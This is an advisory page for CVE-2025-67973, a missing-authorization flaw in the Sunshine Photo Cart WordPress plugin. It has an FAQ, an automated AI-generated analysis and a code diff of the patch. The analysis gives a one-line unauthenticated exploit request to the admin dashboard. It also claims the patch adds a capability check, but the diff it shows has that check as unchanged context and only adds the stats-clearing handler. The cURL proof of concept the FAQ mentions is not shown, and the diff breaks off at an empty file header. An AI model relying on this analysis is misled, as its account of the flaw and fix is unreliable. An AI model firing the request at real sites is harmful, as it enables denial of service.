What is CVE-2025-67973?

CVE-2025-67973 is a medium severity vulnerability found in the Sunshine Photo Cart plugin for WordPress, specifically versions up to and including 3.5.6.2. It is caused by a missing authorization check in the administrative dashboard, allowing unauthenticated attackers to perform unauthorized actions.

How does this vulnerability work?

The vulnerability allows attackers to send a GET request to the WordPress admin dashboard with a specific parameter, triggering a resource-intensive database operation without any user authentication. This can lead to denial of service or data manipulation.

Who is affected by this vulnerability?

Any WordPress site using the Sunshine Photo Cart plugin version 3.5.6.2 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if I am affected?

To check if you are affected, navigate to your WordPress admin dashboard, go to the Plugins section, and locate the Sunshine Photo Cart plugin. Verify the version number; if it is 3.5.6.2 or earlier, you are vulnerable.

How can I fix this vulnerability?

The vulnerability is fixed in version 3.5.7.1 of the Sunshine Photo Cart plugin. Update your plugin to this version or later to apply the necessary authorization checks and prevent unauthorized access.

What does the risk level of 'Medium' mean?

A medium risk level indicates that while the vulnerability is not the most critical, it still poses a significant threat. Exploitation can lead to unauthorized actions that may affect site performance or data integrity, necessitating prompt attention.

What is the CVSS score for this vulnerability?

CVE-2025-67973 has a CVSS score of 5.3, which reflects its medium severity. The score is determined based on factors such as exploitability, impact, and the complexity of the attack.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. The PoC for CVE-2025-67973 shows how an attacker can send a simple GET request to trigger the unauthorized action, highlighting the ease of exploitation.

How does the PoC exploit the vulnerability?

The PoC uses a cURL request to send a GET parameter to the vulnerable endpoint. This request triggers the recalculation function without any authentication, showcasing how an attacker can exploit the missing authorization check.

What are the potential consequences of exploitation?

Successful exploitation can lead to server resource exhaustion, potentially causing denial of service. Additionally, it may allow unauthorized data manipulation through forced database recalculations, affecting order statistics and site functionality.

What best practices can help prevent similar vulnerabilities?

To prevent similar vulnerabilities, regularly update all plugins and themes, implement proper access controls, and conduct security audits. Additionally, consider using security plugins that monitor for unauthorized changes and vulnerabilities.

Where can I find more information about CVE-2025-67973?

Detailed information about CVE-2025-67973 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security resources. Regularly check these sources for updates on vulnerabilities and patches.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67973: Sunshine Photo Cart <= 3.5.6.2 – Missing Authorization (sunshine-photo-cart)

CVE ID CVE-2025-67973

Plugin sunshine-photo-cart

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.5.6.2

Patched Version 3.5.7.1

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67973:
The Sunshine Photo Cart WordPress plugin version 3.5.6.2 and earlier contains a missing authorization vulnerability in its administrative dashboard statistics recalculation function. This flaw allows unauthenticated attackers to trigger a resource-intensive database operation, potentially causing denial of service or data manipulation.

Atomic Edge research identified the root cause in the `sunshine-photo-cart/includes/admin/dashboard.php` file. The `recalculate_stats()` method lacks any capability check or nonce verification. The vulnerability manifests when the plugin processes the `sunshine_dashboard_clear_stats` GET parameter at line 13. The function executes immediately upon parameter detection without validating user permissions, bypassing WordPress security controls.

Exploitation requires a single HTTP GET request to the WordPress admin dashboard endpoint with the vulnerable parameter. Attackers send `GET /wp-admin/index.php?sunshine_dashboard_clear_stats=1` to trigger the unauthorized action. No authentication, session tokens, or special headers are required. The attack vector is straightforward and can be automated through scripts or botnets.

The patch adds proper authorization checks before executing the statistics recalculation. The fix inserts a capability verification at line 13, requiring the `manage_options` privilege that only administrators possess. The corrected code now validates user permissions before processing the parameter, preventing unauthorized access. The patch also adds proper redirect handling after the authorized operation completes.

Successful exploitation allows unauthenticated attackers to force database recalculations on all order statistics. This can cause server resource exhaustion through repeated requests, potentially leading to denial of service. The vulnerability may also enable data manipulation if the statistics recalculation function has side effects on order data or plugin configuration.

Differential between vulnerable and patched code

Code Diff

--- a/sunshine-photo-cart/includes/admin/class-options.php
+++ b/sunshine-photo-cart/includes/admin/class-options.php
@@ -513,7 +513,7 @@

 				case 'header':
 				case 'title':
-					$html .= '<h3>' . esc_html( $field['name'] ) . '</h3>';
+					$html .= '<h3>' . wp_kses_post( $field['name'] ) . '</h3>';
 					break;

 				case 'html':
--- a/sunshine-photo-cart/includes/admin/class-update.php
+++ b/sunshine-photo-cart/includes/admin/class-update.php
@@ -1342,6 +1342,8 @@
 	public function update_3_galleries_common_update() {
 		global $wpdb;

+		check_admin_referer( 'sunshine_update_3', 'security' );
+
 		$conversions = array(
 			'sunshine_gallery_price_level'       => 'price_level',
 			'sunshine_gallery_password_hint'     => 'password_hint',
--- a/sunshine-photo-cart/includes/admin/dashboard.php
+++ b/sunshine-photo-cart/includes/admin/dashboard.php
@@ -13,6 +13,11 @@
 		if ( ! current_user_can( 'manage_options' ) ) {
 			return false;
 		}
+		if ( isset( $_GET['sunshine_dashboard_clear_stats'] ) ) {
+			$this->recalculate_stats();
+			wp_safe_redirect( admin_url( 'index.php' ) );
+			exit;
+		}
 		wp_add_dashboard_widget( 'sunshine-dashboard', __( 'Sunshine Photo Cart Sales Summary', 'sunshine-photo-cart' ), array( $this, 'sales' ), null, null, 'normal', 'high' );
 		if ( $this->needs_setup() ) {
 			wp_add_dashboard_widget( 'sunshine-dashboard-setup', __( 'Sunshine Photo Cart Setup', 'sunshine-photo-cart' ), array( $this, 'setup' ), null, null, 'side', 'high' );
@@ -114,55 +119,55 @@
 			$term_placeholders = implode( ',', $term_placeholders );

 			// Get the current month's start and end dates
-			$current_month_start = date( 'Y-m-01' );
-			$current_month_end   = date( 'Y-m-t' );
+			$current_month_start = date( 'Y-m-01 00:00:00' );
+			$current_month_end   = date( 'Y-m-t 23:59:59' );

 			// Prepare the SQL query
 			$query = $wpdb->prepare(
 				"
-				SELECT SUM(pm.meta_value) AS order_total, COUNT(p.ID) AS order_count
-				FROM {$wpdb->posts} p
-				INNER JOIN {$wpdb->postmeta} pm ON p.ID = pm.post_id
-				INNER JOIN {$wpdb->postmeta} pm2 ON p.ID = pm2.post_id
-				INNER JOIN {$wpdb->term_relationships} tr ON p.ID = tr.object_id
-				INNER JOIN {$wpdb->term_taxonomy} tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
-				INNER JOIN {$wpdb->terms} t ON tt.term_id = t.term_id
-				WHERE p.post_type = 'sunshine-order'
-				AND pm.meta_key = 'total'
-				AND pm2.meta_key = 'mode' AND pm2.meta_value = 'live'
-				AND tt.taxonomy = 'sunshine-order-status'
-				AND t.slug IN ( $term_placeholders )
-			    AND p.post_date >= %s
-			    AND p.post_date <= %s
-				AND p.post_status = 'publish'
-			",
+			SELECT SUM(pm.meta_value) AS order_total, COUNT(p.ID) AS order_count
+			FROM {$wpdb->posts} p
+			INNER JOIN {$wpdb->postmeta} pm ON p.ID = pm.post_id
+			INNER JOIN {$wpdb->postmeta} pm2 ON p.ID = pm2.post_id
+			INNER JOIN {$wpdb->term_relationships} tr ON p.ID = tr.object_id
+			INNER JOIN {$wpdb->term_taxonomy} tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
+			INNER JOIN {$wpdb->terms} t ON tt.term_id = t.term_id
+			WHERE p.post_type = 'sunshine-order'
+			AND pm.meta_key = 'total'
+			AND pm2.meta_key = 'mode' AND pm2.meta_value = 'live'
+			AND tt.taxonomy = 'sunshine-order-status'
+			AND t.slug IN ( $term_placeholders )
+		    AND p.post_date >= %s
+		    AND p.post_date <= %s
+			AND p.post_status = 'publish'
+		",
 				array_merge( $paid_statuses, array( $current_month_start, $current_month_end ) )
 			);

 			// Retrieve the results
 			$this_month = $wpdb->get_row( $query );

-			$last_month_start = date( 'Y-m-01', strtotime( '-1 month' ) );
-			$last_month_end   = date( 'Y-m-t', strtotime( '-1 month' ) );
+			$last_month_start = date( 'Y-m-01 00:00:00', strtotime( '-1 month' ) );
+			$last_month_end   = date( 'Y-m-t 23:59:59', strtotime( '-1 month' ) );

 			// Prepare the SQL query
 			$query = $wpdb->prepare(
 				"
-				SELECT SUM(pm.meta_value) AS order_total, COUNT(p.ID) AS order_count
-				FROM {$wpdb->posts} p
-				INNER JOIN {$wpdb->postmeta} pm ON p.ID = pm.post_id
-				INNER JOIN {$wpdb->postmeta} pm2 ON p.ID = pm2.post_id
-				INNER JOIN {$wpdb->term_relationships} tr ON p.ID = tr.object_id
-				INNER JOIN {$wpdb->term_taxonomy} tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
-				INNER JOIN {$wpdb->terms} t ON tt.term_id = t.term_id
-				WHERE p.post_type = 'sunshine-order'
-				AND pm.meta_key = 'total'
-				AND pm2.meta_key = 'mode' AND pm2.meta_value = 'live'
-				AND tt.taxonomy = 'sunshine-order-status'
-				AND t.slug IN ( $term_placeholders )
-				AND p.post_date >= %s
-				AND p.post_date <= %s
-			",
+			SELECT SUM(pm.meta_value) AS order_total, COUNT(p.ID) AS order_count
+			FROM {$wpdb->posts} p
+			INNER JOIN {$wpdb->postmeta} pm ON p.ID = pm.post_id
+			INNER JOIN {$wpdb->postmeta} pm2 ON p.ID = pm2.post_id
+			INNER JOIN {$wpdb->term_relationships} tr ON p.ID = tr.object_id
+			INNER JOIN {$wpdb->term_taxonomy} tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
+			INNER JOIN {$wpdb->terms} t ON tt.term_id = t.term_id
+			WHERE p.post_type = 'sunshine-order'
+			AND pm.meta_key = 'total'
+			AND pm2.meta_key = 'mode' AND pm2.meta_value = 'live'
+			AND tt.taxonomy = 'sunshine-order-status'
+			AND t.slug IN ( $term_placeholders )
+			AND p.post_date >= %s
+			AND p.post_date <= %s
+		",
 				array_merge( $paid_statuses, array( $last_month_start, $last_month_end ) )
 			);

--- a/sunshine-photo-cart/includes/admin/install.php
+++ b/sunshine-photo-cart/includes/admin/install.php
@@ -66,6 +66,10 @@
 add_action( 'admin_init', 'sunshine_install_redirect' );
 function sunshine_install_redirect() {
 	if ( get_option( 'sunshine_install_redirect', false ) ) {
+		// Check user capabilities - require either capability.
+		if ( ! ( current_user_can( 'sunshine_manage_options' ) || current_user_can( 'manage_options' ) ) ) {
+			return;
+		}
 		sunshine_base_install();
 		delete_option( 'sunshine_install_redirect' );
 		wp_redirect( admin_url( 'edit.php?post_type=sunshine-gallery&page=sunshine-install' ) );
@@ -76,6 +80,11 @@
 add_action( 'admin_init', 'sunshine_force_base_install' );
 function sunshine_force_base_install() {
 	if ( isset( $_GET['sunshine_force_base_install'] ) ) {
+		// Check user capabilities - require either capability.
+		if ( ! ( current_user_can( 'sunshine_manage_options' ) || current_user_can( 'manage_options' ) ) ) {
+			wp_die( esc_html__( 'You do not have permission to perform this action.', 'sunshine-photo-cart' ), 403 );
+		}
+
 		sunshine_base_install();
 		wp_redirect( admin_url( 'edit.php?post_type=sunshine-gallery&page=sunshine-install' ) );
 		exit;
@@ -85,7 +94,11 @@
 // On install, flush rewrite rules.
 add_action( 'admin_init', 'sunshine_flush_rewrite_rules', 100 );
 function sunshine_flush_rewrite_rules() {
-	if ( is_admin() && isset( $_GET['page'] ) && $_GET['page'] == 'sunshine-install' ) {
+	if ( is_admin() && isset( $_GET['page'] ) && sanitize_text_field( wp_unslash( $_GET['page'] ) ) === 'sunshine-install' ) {
+		// Check user capabilities - require either capability.
+		if ( ! ( current_user_can( 'sunshine_manage_options' ) || current_user_can( 'manage_options' ) ) ) {
+			return;
+		}
 		flush_rewrite_rules();
 	}
 }
--- a/sunshine-photo-cart/includes/admin/sunshine-gallery.php
+++ b/sunshine-photo-cart/includes/admin/sunshine-gallery.php
@@ -825,61 +825,93 @@
 		IMPORTING FOLDER
 		**********/
 		$( document ).on( 'click', '#import', function(){
-			var images_to_upload = $( 'select[name="images_directory"] option:selected' ).data( 'count' );
-			if ( !images_to_upload ) {
+			var $directoryOption = $( 'select[name="images_directory"] option:selected' );
+			var selected_directory = $directoryOption.val();
+			if ( ! selected_directory ) {
 				return false;
 			}
 			var processed_images = 0;
 			$( '#sunshine-gallery-images-processing').removeClass( 'success' );
 			$( '#sunshine-gallery-image-errors' ).html( '' );
-			$( '#sunshine-gallery-images-processing div.status' ).html( 'Uploading <span class="processed">0</span> of <span class="total-files">' + images_to_upload + '</span> files...<span class="current-file"></span>' );
+			$( '#sunshine-gallery-images-processing div.status' ).html( 'Uploading <span class="processed">0</span> of <span class="total-files">0</span> files...<span class="current-file"></span>' );
 			$( '#sunshine-gallery-images-processing' ).show();

 			var watermark = $( 'input[name="watermark"]' ).prop( 'checked' );

-			for ( i = 1; i <= images_to_upload; i++ ) {
-				var data = {
-					'action': 'sunshine_gallery_import',
-					'gallery_id': <?php echo esc_js( $post->ID ); ?>,
-					'dir': $( 'select[name="images_directory"] option:selected' ).val(),
-					'item_number': i,
-					'watermark': ( watermark ) ? 1 : 0
-				};
-				$.postq( 'sunshinegalleryimport', ajaxurl, data, function(response) {
-					if ( response.success === true ) {
-						$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( response.data.file_name + ' uploaded' );
-						if ( response.data.image_html ) {
-							$( '#sunshine-gallery-image-list' ).append( response.data.image_html );
-						} else {
-							$( '#sunshine-gallery-images ul#files' ).append(
-								$('<li/>', {
-									'id': 'image-' + response.data.image_id,
-									html: response.data.file_name
-								})
-							);
-						}
-					} else {
-						$( '#sunshine-gallery-image-errors' ).append( '<li>' + response.data.file + ' could not be imported: ' + response.data.error + '</li>' );
-						$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( response.data.file + ' not imported: ' + response.data.error );
-					}
-				}).fail( function( jqXHR ) {
-					if ( jqXHR.status == 500 || jqXHR.status == 0 ){
-						$( '#sunshine-gallery-image-errors' ).append( '<li><strong><?php echo esc_js( __( 'An image did not fully upload because it is too large for your server to handle. Thumbnails and watermarks may not have been applied.', 'sunshine-photo-cart' ) ); ?></strong></li>' );
+			var request_data = {
+				'action': 'sunshine_gallery_import_list',
+				'gallery_id': <?php echo esc_js( $post->ID ); ?>,
+				'dir': selected_directory
+			};
+
+			$.post( ajaxurl, request_data )
+				.done( function( response ) {
+					if ( response.success !== true || ! response.data || ! response.data.files || ! response.data.files.length ) {
+						$( '#sunshine-gallery-image-errors' ).append( '<li><?php echo esc_js( __( 'No importable images were found in the selected folder.', 'sunshine-photo-cart' ) ); ?></li>' );
 						$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( 'ERROR' );
+						return;
 					}
-				}).always(function(){
-					processed_images++;
-					total_images++;
-					$( '#sunshine-gallery-images-processing span.processed' ).html( processed_images );
-					if ( processed_images >= images_to_upload ) {
-						// When done
-						$( '#sunshine-ftp-new-images' ).hide();
-						$( '#sunshine-gallery-images-processing div.status' ).html( 'Image import complete!' );
-						$( '#sunshine-gallery-images-processing' ).addClass( 'success' ).delay( 2000 ).fadeOut( 400 );
+
+					var import_files = response.data.files;
+					var images_to_upload = import_files.length;
+					$( '#sunshine-gallery-images-processing div.status span.total-files' ).html( images_to_upload );
+
+					for ( let import_index = 0; import_index < import_files.length; import_index++ ) {
+						const item_number = import_index + 1;
+						const file_name = import_files[ import_index ];
+						var data = {
+							'action': 'sunshine_gallery_import',
+							'gallery_id': <?php echo esc_js( $post->ID ); ?>,
+							'dir': selected_directory,
+							'item_number': item_number,
+							'watermark': ( watermark ) ? 1 : 0
+						};
+
+						$.postq( 'sunshinegalleryimport', ajaxurl, data, function( response ) {
+							if ( response.success === true ) {
+								$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( response.data.file_name + ' uploaded' );
+								if ( response.data.image_html ) {
+									$( '#sunshine-gallery-image-list' ).append( response.data.image_html );
+								} else {
+									$( '#sunshine-gallery-images ul#files' ).append(
+										$('<li/>', {
+											'id': 'image-' + response.data.image_id,
+											html: response.data.file_name
+										})
+									);
+								}
+								total_images++;
+							} else {
+								$( '#sunshine-gallery-image-errors' ).append( '<li>' + response.data.file + ' could not be imported: ' + response.data.error + '</li>' );
+								$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( response.data.file + ' not imported: ' + response.data.error );
+							}
+						}).fail( function( jqXHR ) {
+							var $error_item = $( '<li/>' );
+							$error_item.append( $( '<strong/>' ).text( file_name ) );
+							if ( jqXHR.status === 500 || jqXHR.status === 0 ) {
+								$error_item.append( document.createTextNode( ': <?php echo esc_js( __( 'The image did not fully upload because it is too large for your server to handle. Thumbnails and watermarks may not have been applied.', 'sunshine-photo-cart' ) ); ?>' ) );
+							} else {
+								$error_item.append( document.createTextNode( ': ' + jqXHR.status + ' ' + jqXHR.statusText ) );
+							}
+							$( '#sunshine-gallery-image-errors' ).append( $error_item );
+							$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( file_name + ' failed' );
+						}).always(function(){
+							processed_images++;
+							$( '#sunshine-gallery-images-processing span.processed' ).html( processed_images );
+							if ( processed_images >= images_to_upload ) {
+								// When done
+								$( '#sunshine-ftp-new-images' ).hide();
+								$( '#sunshine-gallery-images-processing div.status' ).html( 'Image import complete!' );
+								$( '#sunshine-gallery-images-processing' ).addClass( 'success' ).delay( 2000 ).fadeOut( 400 );
+							}
+							$( document ).trigger( 'refresh_images' );
+						});
 					}
-					$( document ).trigger( 'refresh_images' );
-				});
-			}
+				} )
+				.fail( function() {
+					$( '#sunshine-gallery-image-errors' ).append( '<li><?php echo esc_js( __( 'Unable to inspect the selected directory before import. Please try again.', 'sunshine-photo-cart' ) ); ?></li>' );
+					$( '#sunshine-gallery-images-processing div.status span.current-file' ).html( 'ERROR' );
+				} );

 			return false;
 		});
@@ -1187,8 +1219,7 @@
 	if ( ! is_wp_error( $attachment_id ) ) {

 		// Use meta value to store all image IDs for gallery
-		$gallery   = sunshine_get_gallery( $gallery_id );
-		$image_ids = $gallery->add_image_id( $attachment_id );
+		$gallery = sunshine_get_gallery( $gallery_id );

 		$attachment_image_meta = wp_generate_attachment_metadata( $attachment_id, $file_path );

@@ -1243,13 +1274,15 @@

 		add_post_meta( $attachment_id, 'created_timestamp', $created_timestamp );
 		add_post_meta( $attachment_id, 'sunshine_file_name', $file_name );
-		$apply_watermark = ( ! empty( $watermark ) ) ? 1 : 0;
+		$apply_watermark = ( ! empty( $watermark ) ) ? SPC()->get_option( 'watermark_image' ) : 0;
 		add_post_meta( $attachment_id, 'sunshine_watermark', $apply_watermark );

 		$attachment_meta_data = wp_update_attachment_metadata( $attachment_id, $attachment_image_meta );

 		do_action( 'sunshine_after_image_process', $attachment_id, $file_path, $apply_watermark );

+		$image_ids = $gallery->add_image_id( $attachment_id );
+
 		$return = array(
 			'image_id'   => $attachment_id,
 			'file_name'  => $file_name,
@@ -1503,6 +1536,58 @@
 	}
 }

+add_action( 'wp_ajax_sunshine_gallery_import_list', 'sunshine_ajax_gallery_import_list' );
+/**
+ * Return the list of files available for import within a directory.
+ *
+ * @since 3.0
+ * @return void
+ */
+function sunshine_ajax_gallery_import_list() {
+	if ( ! current_user_can( 'upload_files' ) ) {
+		wp_send_json_error(
+			array(
+				'message' => __( 'You do not have permission to import images.', 'sunshine-photo-cart' ),
+			)
+		);
+	}
+
+	$dir = ! empty( $_POST['dir'] ) ? sanitize_text_field( wp_unslash( $_POST['dir'] ) ) : '';
+	if ( '' === $dir ) {
+		wp_send_json_error(
+			array(
+				'message' => __( 'A directory must be selected before importing.', 'sunshine-photo-cart' ),
+			)
+		);
+	}
+
+	$folder = sunshine_get_import_directory() . '/' . $dir;
+	if ( ! is_dir( $folder ) ) {
+		wp_send_json_error(
+			array(
+				'message' => __( 'The selected directory is not available.', 'sunshine-photo-cart' ),
+			)
+		);
+	}
+
+	$images = sunshine_get_images_in_folder( $folder );
+	if ( empty( $images ) ) {
+		wp_send_json_success(
+			array(
+				'files' => array(),
+			)
+		);
+	}
+
+	$files = array_map( 'basename', $images );
+
+	wp_send_json_success(
+		array(
+			'files' => array_values( $files ),
+		)
+	);
+}
+
 add_action( 'wp_ajax_sunshine_gallery_import', 'sunshine_ajax_gallery_import' );
 function sunshine_ajax_gallery_import() {

--- a/sunshine-photo-cart/includes/admin/tools/regenerate.php
+++ b/sunshine-photo-cart/includes/admin/tools/regenerate.php
@@ -30,12 +30,27 @@
 	protected function do_process() {
 		global $wpdb;

-		$gallery_id = ( isset( $_GET['sunshine_gallery'] ) ) ? intval( wp_unslash( $_GET['sunshine_gallery'] ) ) : '';
+		$gallery_id               = ( isset( $_GET['sunshine_gallery'] ) ) ? intval( wp_unslash( $_GET['sunshine_gallery'] ) ) : '';
+		$watermark_image          = SPC()->get_option( 'watermark_image' );
+		$apply_watermark          = isset( $_GET['apply_watermark'] ) ? sanitize_text_field( wp_unslash( $_GET['apply_watermark'] ) ) : null;
+		$images_without_watermark = 0;
+
 		if ( ! empty( $gallery_id ) ) {
 			$gallery = sunshine_get_gallery( $gallery_id );
 			/* translators: %s is the gallery title */
 			$title = sprintf( __( 'Regenerating images for "%s"', 'sunshine-photo-cart' ), $gallery->get_name() );
 			$count = $gallery->get_image_count();
+
+			// Check for images without watermark in this gallery.
+			if ( ! empty( $watermark_image ) && null === $apply_watermark ) {
+				$image_ids = $gallery->get_image_ids();
+				foreach ( $image_ids as $image_id ) {
+					$watermark_meta = get_post_meta( $image_id, 'sunshine_watermark', true );
+					if ( '0' === $watermark_meta || 0 === $watermark_meta ) {
+						$images_without_watermark++;
+					}
+				}
+			}
 		} else {
 			$title = __( 'Regenerating images', 'sunshine-photo-cart' );
 			$args  = array(
@@ -46,6 +61,35 @@
 			);
 			$query = new WP_Query( $args );
 			$count = $query->found_posts;
+
+			// Check for images without watermark.
+			if ( ! empty( $watermark_image ) && null === $apply_watermark ) {
+				$args_no_watermark        = array(
+					'post_type'   => 'attachment',
+					'post_status' => 'any',
+					'nopaging'    => true,
+					'meta_query'  => array(
+						'relation' => 'AND',
+						array(
+							'key'     => 'sunshine_file_name',
+							'compare' => 'EXISTS',
+						),
+						array(
+							'key'     => 'sunshine_watermark',
+							'value'   => '0',
+							'compare' => '=',
+						),
+					),
+				);
+				$query_no_watermark       = new WP_Query( $args_no_watermark );
+				$images_without_watermark = $query_no_watermark->found_posts;
+			}
+		}
+
+		// Show watermark options if needed.
+		if ( ! empty( $watermark_image ) && null === $apply_watermark && $images_without_watermark > 0 ) {
+			$this->show_watermark_options( $images_without_watermark, $gallery_id );
+			return;
 		}

 		?>
@@ -68,7 +112,8 @@
 					'action': 'sunshine_regenerate_image',
 					'gallery': '<?php echo esc_js( $gallery_id ); ?>',
 					'item_number': item_number,
-					'security': "<?php echo esc_js( wp_create_nonce( 'sunshine_regenerate_image' ) ); ?>"
+					'security': "<?php echo esc_js( wp_create_nonce( 'sunshine_regenerate_image' ) ); ?>",
+					'apply_watermark': "<?php echo esc_js( $apply_watermark ); ?>"
 				};
 				$.postq( 'sunshineimageregenerate', ajaxurl, data, function(response) {
 					if ( response.error ) {
@@ -103,6 +148,55 @@

 	}

+	/**
+	 * Show watermark options before regeneration.
+	 *
+	 * @param int    $images_without_watermark Number of images without watermark.
+	 * @param string $gallery_id               Optional gallery ID.
+	 */
+	private function show_watermark_options( $images_without_watermark, $gallery_id = '' ) {
+		$base_url = admin_url( 'edit.php?post_type=sunshine-gallery&page=sunshine-tools&tool=regenerate-images' );
+		$base_url = wp_nonce_url( $base_url, 'sunshine_tool_' . $this->get_key() );
+
+		if ( ! empty( $gallery_id ) ) {
+			$base_url = add_query_arg( 'sunshine_gallery', $gallery_id, $base_url );
+		}
+
+		$apply_watermark_url = add_query_arg( 'apply_watermark', '1', $base_url );
+		$keep_settings_url   = add_query_arg( 'apply_watermark', '0', $base_url );
+
+		?>
+		<div class="sunshine-watermark-notice" style="background: #fff; border: 1px solid #c3c4c7; border-left: 4px solid #dba617; padding: 12px; margin: 20px 0;">
+			<h3 style="margin-top: 0;"><?php esc_html_e( 'Watermark Settings Detected', 'sunshine-photo-cart' ); ?></h3>
+			<p>
+				<?php
+				echo esc_html(
+					sprintf(
+						/* translators: %d is the number of images without watermark */
+						_n(
+							'You have %d image that does not have watermark enabled, but you have a watermark set in your general settings.',
+							'You have %d images that do not have watermark enabled, but you have a watermark set in your general settings.',
+							$images_without_watermark,
+							'sunshine-photo-cart'
+						),
+						$images_without_watermark
+					)
+				);
+				?>
+			</p>
+			<p><?php esc_html_e( 'How would you like to proceed?', 'sunshine-photo-cart' ); ?></p>
+			<p>
+				<a href="<?php echo esc_url( $apply_watermark_url ); ?>" class="button button-primary">
+					<?php esc_html_e( 'Apply watermark to all images', 'sunshine-photo-cart' ); ?>
+				</a>
+				<a href="<?php echo esc_url( $keep_settings_url ); ?>" class="button">
+					<?php esc_html_e( 'Keep current image watermark settings', 'sunshine-photo-cart' ); ?>
+				</a>
+			</p>
+		</div>
+		<?php
+	}
+
 	function regenerate_image() {
 		global $wpdb, $intermediate_image_sizes;

@@ -212,9 +306,16 @@
 			update_post_meta( $image_id, 'created_timestamp', $created_timestamp );
 		}

-		$watermark = get_post_meta( $image_id, 'sunshine_watermark', true );
-		if ( $watermark === '' ) {
-			$watermark = 1; // If no watermark setting is there, assume we want it to be watermarked and current settings will dictate if that happens.
+		$apply_watermark = isset( $_POST['apply_watermark'] ) ? sanitize_text_field( wp_unslash( $_POST['apply_watermark'] ) ) : '';
+
+		// If user chose to apply watermark to all, force watermark on.
+		if ( '1' === $apply_watermark ) {
+			$watermark = 1;
+		} else {
+			$watermark = get_post_meta( $image_id, 'sunshine_watermark', true );
+			if ( $watermark === '' ) {
+				$watermark = 1; // If no watermark setting is there, assume we want it to be watermarked and current settings will dictate if that happens.
+			}
 		}

 		do_action( 'sunshine_after_image_process', $image_id, $file_path, $watermark );
--- a/sunshine-photo-cart/includes/admin/tracking.php
+++ b/sunshine-photo-cart/includes/admin/tracking.php
@@ -76,6 +76,32 @@
 	$data['paypal_count'] = $orders->order_count;
 	$data['paypal_total'] = $orders->total;

+	// Square app fee totals
+	$sql                          = "SELECT
+			    COUNT(DISTINCT {$wpdb->prefix}posts.ID) AS order_count,
+			    SUM(meta_fee.meta_value) AS total
+			FROM {$wpdb->prefix}posts
+			JOIN {$wpdb->prefix}postmeta AS meta_fee ON {$wpdb->prefix}posts.ID = meta_fee.post_id AND meta_fee.meta_key = 'square_app_fee'
+			JOIN {$wpdb->prefix}postmeta AS meta_mode ON {$wpdb->prefix}posts.ID = meta_mode.post_id AND meta_mode.meta_key = 'mode' AND meta_mode.meta_value = 'live'
+			WHERE {$wpdb->prefix}posts.post_type = 'sunshine-order'
+			";
+	$orders                       = $wpdb->get_row( $sql );
+	$data['square_app_fee']       = round( $orders->total, 2 );
+	$data['square_app_fee_count'] = (int) $orders->order_count;
+
+	// Stripe app fee totals
+	$sql                          = "SELECT
+			    COUNT(DISTINCT {$wpdb->prefix}posts.ID) AS order_count,
+			    SUM(meta_fee.meta_value) AS total
+			FROM {$wpdb->prefix}posts
+			JOIN {$wpdb->prefix}postmeta AS meta_fee ON {$wpdb->prefix}posts.ID = meta_fee.post_id AND meta_fee.meta_key = 'application_fee_amount'
+			JOIN {$wpdb->prefix}postmeta AS meta_mode ON {$wpdb->prefix}posts.ID = meta_mode.post_id AND meta_mode.meta_key = 'mode' AND meta_mode.meta_value = 'live'
+			WHERE {$wpdb->prefix}posts.post_type = 'sunshine-order'
+			";
+	$orders                       = $wpdb->get_row( $sql );
+	$data['stripe_app_fee']       = round( $orders->total, 2 );
+	$data['stripe_app_fee_count'] = (int) $orders->order_count;
+
 	$result              = $wpdb->get_var(
 		"SELECT COUNT(*) FROM {$wpdb->prefix}posts p
 		INNER JOIN {$wpdb->prefix}postmeta pm ON p.ID = pm.post_id
@@ -124,6 +150,8 @@
 		$data['gallery_last_created'] = $gallery[0]->post_date;
 	}

+	sunshine_log( $data, 'Tracking data' );
+
 	SPC()->log( 'Tracking data sent' );

 	$response = wp_remote_post(
--- a/sunshine-photo-cart/includes/class-order-item.php
+++ b/sunshine-photo-cart/includes/class-order-item.php
@@ -43,7 +43,7 @@
 		// Set options total from saved meta data.
 		if ( ! empty( $this->meta['options'] ) ) {
 			$this->options = $this->meta['options'];
-			$this->set_options_total();
+			// $this->set_options_total(); // Price is already set in the cart item.
 		}

 		// Calculate subtotal before discount.
@@ -228,11 +228,14 @@

 	public function set_options_total() {
 		if ( ! empty( $this->meta['options'] ) ) {
+			sunshine_log( $this->meta['options'], 'options' );
 			foreach ( $this->meta['options'] as $option_item ) {
 				if ( ! empty( $option_item['price'] ) ) {
+					sunshine_log( '$ option_item[price]: ' . $option_item['price'] );
 					$this->options_total += $option_item['price'];
 				}
 			}
+			sunshine_log( '$$$ Options total: ' . $this->options_total );
 		}
 	}

--- a/sunshine-photo-cart/includes/class-product-option.php
+++ b/sunshine-photo-cart/includes/class-product-option.php
@@ -81,7 +81,7 @@
 		}
 		$product_option_prices_for_this_option = $product_option_prices[ $this->get_id() ];

-		if ( $type == 'checkbox' ) {
+		if ( $type == 'checkbox' || $type == 'text' ) {
 			$items[] = array(
 				'name'  => $this->get_name(),
 				'price' => $product_option_prices_for_this_option[ $this->price_level_id ],
@@ -114,6 +114,8 @@
 	public function get_item_name( $id ) {
 		if ( $this->get_type() == 'checkbox' ) {
 			return $this->get_name();
+		} elseif ( $this->get_type() == 'text' ) {
+			return $id;
 		}
 		$options = $this->get_options();
 		if ( ! empty( $options ) ) {
--- a/sunshine-photo-cart/includes/class-product.php
+++ b/sunshine-photo-cart/includes/class-product.php
@@ -381,7 +381,7 @@
 						$available_options[ $option_id ] = new SPC_Product_Option( $option_id, $this->get_id(), $price_level_id );
 					}
 				}
-			} else { // Single checkbox
+			} else { // Single checkbox or text field
 				if ( isset( $option_data[ $price_level_id ] ) && $option_data[ $price_level_id ] !== '' ) {
 					$available_options[ $option_id ] = new SPC_Product_Option( $option_id, $this->get_id(), $price_level_id );
 				}
--- a/sunshine-photo-cart/includes/emails/class-email-order-status.php
